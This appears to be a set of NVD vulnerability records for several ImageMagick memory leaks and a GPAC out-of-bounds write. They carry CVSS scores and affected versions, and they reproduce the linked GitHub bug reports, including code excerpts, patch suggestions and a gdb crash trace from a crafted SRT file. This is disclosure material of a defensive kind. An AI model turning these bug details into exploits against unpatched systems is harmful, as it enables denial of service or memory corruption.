[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "E982CE9C-89F7-4A5D-B036-A9A483493D5B", "versionEndExcluding": "6.9.10-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F7DF2A1-ADDE-48C4-BD39-CCA15D0D767A", "versionEndExcluding": "7.0.8-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1452
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> potential memory leak in ReadSIXELImage in sixel.c ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> The first critical code snippet is: https://github.com/ImageMagick/ImageMagick/blob/master/coders/sixel.c#L539 ```c if (imsx > max_x || imsy > max_y) { // line 539 dmsx = max_x; dmsy = max_y; if (SetImageExtent(image,dmsx,dmsy,exception) == MagickFalse) { imbuf = (unsigned char *) RelinquishMagickMemory(imbuf); return (MagickFalse); } if ((dmbuf = (unsigned char *) AcquireQuantumMemory(dmsx , dmsy)) == NULL) { //line 547 imbuf = (unsigned char *) RelinquishMagickMemory(imbuf); return (MagickFalse); } for (y = 0; y < dmsy; ++y) { (void) memcpy(dmbuf + dmsx * y, imbuf + imsx * y, dmsx); } imbuf = (unsigned char *) RelinquishMagickMemory(imbuf); imsx = dmsx; imsy = dmsy; imbuf = dmbuf; //line 557 } *pixels = imbuf; //line 560 *pwidth = imsx; *pheight = imsy; *ncolors = max_color_index + 1; *palette = (unsigned char *) AcquireQuantumMemory(*ncolors,4); // line 564 if (*palette == (unsigned char *) NULL) return(MagickFalse); // line 566 ``` When condition at line **539** is satisfied and **dmbuf** is successfully allocated at line **547**, the value of dmbuf is assigned to **imbuf** at line **557** and is finally assigned to the pointer parameter **pixels** at line **560** (i.e. the buf's address is passed outside to the caller function). Now, when the allocation at line **564** failed, the function will return *MagickFalse* at line **566**. Next, I searched the whole project code and only found one call to **sixel_decode** which locates in function **ReadSIXELImage** in sixel.c at line **1057** as the following. The local variable **sixel_pixels** holds the value of **dmbuf**. https://github.com/ImageMagick/ImageMagick/blob/master/coders/sixel.c#L1057 ```c if (sixel_decode(image,(unsigned char *) sixel_buffer,&sixel_pixels,&image->columns,&image->rows,&sixel_palette,&image->colors,exception) == MagickFalse) // line 1057 { sixel_buffer=(char *) RelinquishMagickMemory(sixel_buffer); ThrowReaderException(CorruptImageError,"CorruptImage"); } sixel_buffer=(char *) RelinquishMagickMemory(sixel_buffer); image->depth=24; image->storage_class=PseudoClass; status=SetImageExtent(image,image->columns,image->rows,exception); if (status == MagickFalse) { sixel_pixels=(unsigned char *) RelinquishMagickMemory(sixel_pixels); // line 1068 sixel_palette=(unsigned char *) RelinquishMagickMemory(sixel_palette); return(DestroyImageList(image)); } ``` However, when function *sixel_decode* returned *MagickFalse* as described above, the memory pointed by **sixel_pixels** (i.e. the memory allocated at line 547) was not freed as done at line **1068**. As a result, a memory leak happens. Patch Suggestion: ```c if (sixel_decode(image,(unsigned char *) sixel_buffer,&sixel_pixels,&image->columns,&image->rows,&sixel_palette,&image->colors,exception) == MagickFalse) { sixel_buffer=(char *) RelinquishMagickMemory(sixel_buffer); + sixel_pixels=(unsigned char *) RelinquishMagickMemory(sixel_pixels); ThrowReaderException(CorruptImageError,"CorruptImage"); } ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu at VARAS of IIE
Potential Memory Leak in ReadSIXELImage in coders/sixel.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1452/comments
2
2019-01-17T04:06:51Z
2019-03-11T01:54:07Z
https://github.com/ImageMagick/ImageMagick/issues/1452
400,102,085
1,452
CVE-2019-7397
2019-02-05T00:29:00.510
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "http://hg.graphicsmagick.org/hg/GraphicsMagick/rev/11ad3aeb8ab1" }, { "source": "[email protected]", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "source": "[email protected]", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106847" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/306c1f0fa5754ca78efd16ab752f0e981d4f6b82" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1454" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "E982CE9C-89F7-4A5D-B036-A9A483493D5B", "versionEndExcluding": "6.9.10-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F7DF2A1-ADDE-48C4-BD39-CCA15D0D767A", "versionEndExcluding": "7.0.8-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:graphicsmagick:graphicsmagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA564A9F-4001-4846-A8BB-EAD95674C890", "versionEndExcluding": null, "versionEndIncluding": "1.3.31", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1454
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> Potential memory leak in function WritePDFImage in coders/pdf.c, which is similar to but different from #576. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> **xref** is allocated at line [L1362](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1362) or reallocated at line [L1499](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1499). ```c 1362: xref=(MagickOffsetType *) AcquireQuantumMemory(2048UL,sizeof(*xref)); 1499: xref=(MagickOffsetType *) ResizeQuantumMemory(xref,(size_t) count+2048UL, sizeof(*xref)); ``` However, when the function returns with *MagickFalse* (such as [L1902](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1902) and [L1912](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1912)), **xref** was neither passed outside to the caller function nor freed. I believe the two positions needs to free **xref** because **xref** is freed at the **default case** at [L1931](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1931) while the 2 positions locates in another 2 cases of a switch statement. So memory leak can happen at line **1902** and **1912**. There are many similar positions including [L1965](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1965), [L2011](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2011), [L2021](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2021), [L2082](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2082), [L2179](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2179), [L2427](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1362), [L2437](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2437), [L2488](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2488), [L2529](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2529), [L2539](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2539), [L2594](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2594), [L2682](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2682) and [L2894](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2894). ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 + VS Code - Additional information: code review <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu of VARAS of IIE
Potential Memory Leak in WritePDFImage in coders/pdf.c different from #576
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1454/comments
2
2019-01-17T11:10:56Z
2019-02-12T01:46:36Z
https://github.com/ImageMagick/ImageMagick/issues/1454
400,226,040
1,454
CVE-2019-7398
2019-02-05T00:29:00.570
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "source": "[email protected]", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106848" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1453" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "E982CE9C-89F7-4A5D-B036-A9A483493D5B", "versionEndExcluding": "6.9.10-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F7DF2A1-ADDE-48C4-BD39-CCA15D0D767A", "versionEndExcluding": "7.0.8-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1453
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> memory leak in WriteDIBImage in coders/dib.c ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> The critical code snippets are: https://github.com/ImageMagick/ImageMagick/blob/master/coders/dib.c#L1330 ```c if (dib_info.bits_per_pixel == 8) //line 1330 if (image_info->compression != NoCompression) //line 1331 { size_t length; /* Convert run-length encoded raster pixels. */ length=2UL*(bytes_per_line+2UL)+2UL; dib_data=(unsigned char *) AcquireQuantumMemory(length, // line 1340 (image->rows+2UL)*sizeof(*dib_data)); if (dib_data == (unsigned char *) NULL) { pixels=(unsigned char *) RelinquishMagickMemory(pixels); ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); } dib_info.image_size=(unsigned int) EncodeImage(image,bytes_per_line, pixels,dib_data); pixels=(unsigned char *) RelinquishMagickMemory(pixels); pixels=dib_data; // line 1350 dib_info.compression = BI_RLE8; } ``` and https://github.com/ImageMagick/ImageMagick/blob/master/coders/dib.c#L1367 ```c if (image->storage_class == PseudoClass) //line 1367 { if (dib_info.bits_per_pixel <= 8) //line 1369 { unsigned char *dib_colormap; /* Dump colormap to file. */ dib_colormap=(unsigned char *) AcquireQuantumMemory((size_t) (1UL << dib_info.bits_per_pixel),4*sizeof(*dib_colormap)); if (dib_colormap == (unsigned char *) NULL) // line 1379 ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); // line 1380 q=dib_colormap; ``` According to the code in function WriteDIBImage before line 1330, when **image->storage_class** is not **DirectClass** (i.e. storage class is **PseudoClass**) and **image_info->depth<=8**, **dib_info.bits_per_pixel** can be equal to **8** (at line 1151-1155), as a result, **dib_info.compression** will be BI_RGB (at line 1164-1165). **So the 4 conditions at line 1330, 1331, 1367 and 1369 can be satisfied at the same time in some setting.** When the 4 conditions are satisfied and **dib_data** is successfully allocated at line **1340**, **dib_data** will be assigned to **pixels** at line **1350**. However, when the allocation at line **1377** fails, the function don't free **dib_data** memory as done at line **1410** before returning with exception at line **1378**. As a result, a memory leak will happen. The size of leaked memory is 4*((image->columns*dib_info.bits_per_pixel+31)/32)*(image->rows+2UL)*sizeof(*dib_data) = (image->columns + 4) * (image->rows + 2) * sizeof(*dib_data), which may be a large value. (ps. dib_info.bits_per_pixel is 8) Patch Suggestion: ```c dib_colormap=(unsigned char *) AcquireQuantumMemory((size_t) // line 1377 (1UL << dib_info.bits_per_pixel),4*sizeof(*dib_colormap)); if (dib_colormap == (unsigned char *) NULL) { pixels=(unsigned char *) RelinquishMagickMemory(pixels); ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); } q=dib_colormap; ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu at VARAS of IIE
Potential Memory Leak in WriteDIBImage in coders/dib.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1453/comments
2
2019-01-17T06:50:47Z
2019-02-12T01:46:59Z
https://github.com/ImageMagick/ImageMagick/issues/1453
400,133,504
1,453
CVE-2018-20760
2019-02-06T23:29:00.230
In GPAC 0.7.1 and earlier, gf_text_get_utf8_line in media_tools/text_import.c in libgpac_static.a allows an out-of-bounds write because a certain -1 return value is mishandled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/4c1360818fc8948e9307059fba4dc47ba8ad255d" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1177" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00040.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/3926-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "085CE50F-C216-47FB-A0A6-00BE575E4B4F", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1177
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
In gf_text_get_utf8_line function, gf_utf8_wcstombs return -1 with crafted srt file, it will cause szLineConv[i] = 0 out of bound write root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.3) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./MP4Box...done. (gdb) set args -add crafted.srt overview.mp4 (gdb) r Starting program: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box -add crafted.srt overview.mp4 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Timed Text (SRT) import - text track 580 x 436, font Serif (size 18) Program received signal SIGBUS, Bus error. 0x00007ffff79b2eeb in gf_text_get_utf8_line (szLine=0x7fffffff4d80 "0", lineSize=2048, txt_in=0x66c4e0, unicode_type=2) at media_tools/text_import.c:272 272 szLineConv[i] = 0; (gdb) bt #0 0x00007ffff79b2eeb in gf_text_get_utf8_line (szLine=0x7fffffff4d80 "0", lineSize=2048, txt_in=0x66c4e0, unicode_type=2) at media_tools/text_import.c:272 #1 0x00007ffff79b39c6 in gf_text_import_srt (import=0x7fffffff6030) at media_tools/text_import.c:429 #2 0x00007ffff79bd165 in gf_import_timed_text (import=0x7fffffff6030) at media_tools/text_import.c:2644 #3 0x00007ffff7933f09 in gf_media_import (importer=0x7fffffff6030) at media_tools/media_import.c:10619 #4 0x000000000043727a in import_file (dest=0x65d010, inName=0x7fffffffe7f6 "crafted.srt", import_flags=0, force_fps=0, frames_per_sample=0) at fileimport.c:685 #5 0x000000000041bdac in mp4boxMain (argc=4, argv=0x7fffffffe578) at main.c:4177 #6 0x000000000042215e in main (argc=4, argv=0x7fffffffe578) at main.c:5695 (gdb)
